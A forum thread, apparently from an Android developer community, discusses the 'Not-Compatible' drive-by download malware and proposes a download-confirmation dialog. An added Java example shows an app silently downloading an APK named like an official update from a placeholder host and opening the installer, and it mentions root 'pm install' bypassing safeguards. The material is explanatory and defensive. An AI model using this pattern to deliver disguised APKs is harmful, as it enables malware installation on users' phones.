[Devs] Not-Compatible - Drive-by Downloads

JerryScript (Daydream Believer; joined Mar 8, 2011; 2,055 messages, 1,559 reactions)
I mentioned this several months ago, both here and at XDA, but got little to no feedback. Now I feel action must be taken!

For those who aren't aware of it, there is a major flaw in Android involving downloads. Unlike on your computer that asks you if you want to download something before it starts the download, Android will simply begin a download in the background without any user approval.

Now there are people taking advantage of this vulnerability using what's called the Not-Compatible drive-by download. You visit an infected webpage with your Android phone, and it starts a download and installs software without your knowledge or approval. This can take over your phone entirely, causing it to send SMS to premium numbers resulting in charges, or stealing your personal info and even passwords, or even initiating a call to a premium phone number resulting in charges.

I asked for anyone interested in helping develop a safeguard in the past to post or PM me. I am now asking again. I would like to have an interstitial dialog added anytime a download is started, allowing the user to decide if it should proceed. This is the standard in the computer industry on almost every OS, and IMHO it should be standard on Android.

I will be working on this for the next couple of weeks, attempting to find the most unobtrusive means to ensure user safety without hindering the user experience. If you are interested in helping fix this huge security hole in Android, please let me know!

cole2kb (Retired Moderator; joined Apr 7, 2011; 2,503 messages, 547 reactions)
Interested? Hell yes. Would I be of any actual use, with no knowledge of application development whatsoever? Probably not, lol. I've got skills in Photoshop for icons/interface graphics/logos, but that's about the best I can do, unless you can think of something else/more useful for me to do.

drewwalton19216801 (Well-known member; joined Dec 27, 2010; 2,476 messages, 2,803 reactions)
I mentioned this several months ago, both here and at XDA, but got little to no feedback. Now I feel action must be taken!

For those who aren't aware of it, there is a major flaw in Android involving downloads. Unlike on your computer that asks you if you want to download something before it starts the download, Android will simply begin a download in the background without any user approval.

Now there are people taking advantage of this vulnerability using what's called the Not-Compatible drive-by download. You visit an infected webpage with your Android phone, and it starts a download and installs software without your knowledge or approval. This can take over your phone entirely, causing it to send SMS to premium numbers resulting in charges, or stealing your personal info and even passwords, or even initiating a call to a premium phone number resulting in charges.

I asked for anyone interested in helping develop a safeguard in the past to post or PM me. I am now asking again. I would like to have an interstitial dialog added anytime a download is started, allowing the user to decide if it should proceed. This is the standard in the computer industry on almost every OS, and IMHO it should be standard on Android.

I will be working on this for the next couple of weeks, attempting to find the most unobtrusive means to ensure user safety without hindering the user experience. If you are interested in helping fix this huge security hole in Android, please let me know!

How exactly does this exploit work, in terms of silently installing software? I know you can install an apk silently by using the pm utility, but how does that work from a website?

I'm game for helping to develop this safeguard. In theory it should be pretty simple, except that it won't be applicable to third-party web browsers that have their own download mechanism.

sellers86 (Well-known member; joined Jul 21, 2011; 1,837 messages, 617 reactions)
How exactly does this exploit work, in terms of silently installing software? I know you can install an apk silently by using the pm utility, but how does that work from a website?

I'm game for helping to develop this safeguard. In theory it should be pretty simple, except that it won't be applicable to third-party web browsers that have their own download mechanism.

If it has a separate download mechanism, then it wouldn't matter, because the mechanism asks (i.e. the Opera Mini dialog box). This, in most cases, only pertains to the stock browser. I'd love to help, but I wouldn't have the first clue what to do.

Sent from my LG-VM670 using Tapatalk

JerryScript (Daydream Believer; joined Mar 8, 2011; 2,055 messages, 1,559 reactions)
How exactly does this exploit work, in terms of silently installing software? I know you can install an apk silently by using the pm utility, but how does that work from a website?

I'm game for helping to develop this safeguard. In theory it should be pretty simple, except that it won't be applicable to third-party web browsers that have their own download mechanism.
From what I've read and put together from a lot of different sources/reports, the current exploit initiates the download, then the user has to agree to install an app with a name/description that makes it seem official (anroid.com.Security, Update.apk, etc.). However, on rooted devices the exploit can bypass that, as you've noted with the pm function. I have not seen examples of code being used, but I'm more concerned with the fact that we don't even get security updates on Android ATM, and this exploit will undoubtedly be evolving, so we need to attack it as deep in the system as we can.

I'm pretty sure all downloads are handled by Android at some point deep enough, regardless of the app initiating them or the app's method. That's the first step in resolving this: digging through the download code. I'm beginning by grepping for relevant terms and studying the docs. If we can insert an interstitial dialog allowing the user to download/cancel at a point in the code deep enough to handle all download options, this will be a breeze. If it turns out there are a bunch of different download mechanisms, then we should probably look for a different method.

Here's a preliminary grep of "download" I did at the end of last year. I'm going to run a pretty comprehensive grep overnight; I'll pastebin the results tomorrow.
http://pastebin.com/bGzV7iKt

BTW- I posted about this vulnerability at the end of the year at XDA, got zero responses, meh. ;)

EarthnFire78 (YAY!!! ME :); joined Jan 1, 2012; 964 messages, 232 reactions)
From what I understand about the downloaders, the coding is very simple, and works by exploiting the openness of Java.

A friend that works for the FBI Cyber Division explained to me that 90% of all the viruses look for a way to exploit Java, which is really easy to do.

EarthnFire78 (YAY!!! ME :); joined Jan 1, 2012; 964 messages, 232 reactions)
I really hate Java and Flash...
Then again, I shouldn't complain too much, job security and all...

Flash is worse when it comes to being exploitable, which is one reason I stay away from web pages that are almost completely Flash. For some reason my ISP uses a Flash web page o.0

Even though Flash is easier to exploit than Java, it is not used as much as Java is.

curtis1973 (King Of Pants; joined Aug 7, 2011; 672 messages, 131 reactions)
Temp quick fix: delete the stock browser and Downloads. I use other browsers anyway for downloading and have these two items deleted as system apps. Or, if Jerry doesn't think that's a safe temp alternative, just don't use the stock browser at all. I've never experienced downloads starting with other browsers, only stock. Maybe Miren browser could be used as stock. It's not updated on Market anymore, but it still works great. Maybe the Chinese developer wouldn't mind allowing its use as open source (looks like they stole most of it from other browsers anyway lol).

Edit: never mind, didn't realize this was not an app issue but more of a Droid OS issue. But still... Miren as open source would be nice.

Eollie (Well-known member; joined Feb 22, 2011; 1,534 messages, 258 reactions)
The best way to stop this is to uncheck Unknown sources in Applications. This will not allow them to install.

Another thing is to educate the masses.

Jerry, what you're talking about doing is built into Android. It's the function above. The thing is, the masses of people are not aware of these kinds of things happening. What needs to happen is a reminder that you have it checked each time you reboot, or maybe on a timer after you check the option.

JerryScript (Daydream Believer; joined Mar 8, 2011; 2,055 messages, 1,559 reactions)
Unfortunately, it's not as simple as not using a particular browser or disallowing unknown sources. Those are quick fixes that may work for now, but they do not cover all bases. For example, the DownloadManager is not even part of the browser; it's in frameworks/base, and it can be called from anything with the appropriate permissions. And this exploit was only accidentally published last week, so it will undoubtedly mature.

It may be too much to cover every possibility; after all, a stream can always be buffered to a file. But we can at least cover the standard Android implementations, which is what most exploits would target.
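As an added illustration of the point Jerry makes above (example code written for this thread, not Jerry's code and not from any ROM or from the Not-Compatible sample), here is how little it takes to drive the public DownloadManager client API that lives in frameworks/base. Any app holding only android.permission.INTERNET can enqueue a download, and nothing on that path asks the user anything; the first and only prompt comes later, from the system package installer, which is exactly the step the Unknown sources setting that Eollie mentions gates. The package name, class name and APK URL below are placeholders, and the snippet assumes API level 9 (Gingerbread) or later, where DownloadManager became public.

```java
// Added example, not thread/ROM code. Placeholder package name.
package com.example.dlcheck;

import android.app.Activity;
import android.app.DownloadManager;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.provider.Settings;

/** Manifest needs only: <uses-permission android:name="android.permission.INTERNET"/> */
public class SilentDownloadDemo extends Activity {
    // Placeholder URL; the file name mimics the "official looking" names the thread describes.
    private static final String APK_URL = "http://example.com/Update.apk";
    private static final String APK_MIME = "application/vnd.android.package-archive";
    private long downloadId = -1;

    // Fires once the DownloadProvider service has already written the file to storage.
    private final BroadcastReceiver onComplete = new BroadcastReceiver() {
        @Override
        public void onReceive(Context ctx, Intent intent) {
            long id = intent.getLongExtra(DownloadManager.EXTRA_DOWNLOAD_ID, -1);
            if (id != downloadId) return;
            DownloadManager dm = (DownloadManager) getSystemService(DOWNLOAD_SERVICE);
            Cursor c = dm.query(new DownloadManager.Query().setFilterById(id));
            if (c == null) return;
            try {
                if (!c.moveToFirst()) return;
                int status = c.getInt(c.getColumnIndex(DownloadManager.COLUMN_STATUS));
                if (status != DownloadManager.STATUS_SUCCESSFUL) return;
                String local = c.getString(c.getColumnIndex(DownloadManager.COLUMN_LOCAL_URI));
                if (local != null) offerInstall(Uri.parse(local));
            } finally {
                c.close();
            }
        }
    };

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        registerReceiver(onComplete, new IntentFilter(DownloadManager.ACTION_DOWNLOAD_COMPLETE));

        DownloadManager dm = (DownloadManager) getSystemService(DOWNLOAD_SERVICE);
        DownloadManager.Request req = new DownloadManager.Request(Uri.parse(APK_URL));
        req.setTitle("Update");          // what the notification shade will show
        req.setMimeType(APK_MIME);
        // No dialog, no confirmation: the transfer starts in the background right here.
        downloadId = dm.enqueue(req);
    }

    /** True when the Unknown sources box is ticked, i.e. the installer will accept a sideloaded APK. */
    static boolean unknownSourcesAllowed(Context ctx) {
        return Settings.Secure.getInt(ctx.getContentResolver(),
                Settings.Secure.INSTALL_NON_MARKET_APPS, 0) == 1;
    }

    private void offerInstall(Uri apk) {
        if (!unknownSourcesAllowed(this)) {
            // Eollie's mitigation: the package installer refuses the APK, so the chain stops here
            // (on an unrooted device; a root shell can still run `pm install` and skip this UI).
            return;
        }
        // First moment the user sees anything: the system PackageInstaller lists the
        // requested permissions and shows an Install button.
        Intent install = new Intent(Intent.ACTION_VIEW);
        install.setDataAndType(apk, APK_MIME);
        startActivity(install);
    }

    @Override
    protected void onDestroy() {
        unregisterReceiver(onComplete);
        super.onDestroy();
    }
}
```

Two things worth noting about where the checks sit. The Unknown sources test is performed by the PackageInstaller activity, not by the package manager service, which is why `pm install` from a root shell (the silent path drewwalton asks about) never encounters it. And `enqueue()` does not download anything itself: it inserts a row into the Downloads content provider, and the DownloadProvider service (packages/providers/DownloadProvider in AOSP) performs the transfer. An interstitial of the kind proposed in this thread would therefore have to be placed in that service or provider rather than in the browser, since every caller of the public API, browser or otherwise, ends up there.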

nodamnspam (New member; joined Feb 20, 2011; 2 messages, 3 reactions)
Thanks for looking into this Jerry and thanks for all your hard work, both you and other Devs like LeslieAnn (running Harmonia 2.06 on my OV... so is my wife). I wish I could do more for the community, but I'm more of a phone geek than anything else. Development is beyond me.